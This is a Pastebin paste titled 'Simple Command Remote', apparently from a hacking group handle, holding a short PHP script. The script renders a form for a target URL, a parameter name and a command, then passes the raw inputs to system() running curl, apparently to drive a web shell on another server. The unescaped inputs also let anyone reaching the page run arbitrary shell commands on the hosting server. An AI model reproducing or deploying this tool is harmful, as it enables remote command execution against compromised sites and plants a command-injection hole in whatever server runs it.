Advertisement
AZZATSSINS_CYBERSERK

Simple Command Remote

May 28th, 2017
277
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.27 KB | None | 0 0
  1. <?php
  2. echo "<form method=post>URL : <input name=target><br>POST NAME : <input name=anu><br>COMMAND : <input name=cmd><br><input type=submit value=RUN name=azx></form><br><br>";
  3. if($_POST["azx"]){
  4. echo system('curl -d '.$_POST["anu"].'="'.$_POST["cmd"].'" '.$_POST["target"]);}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement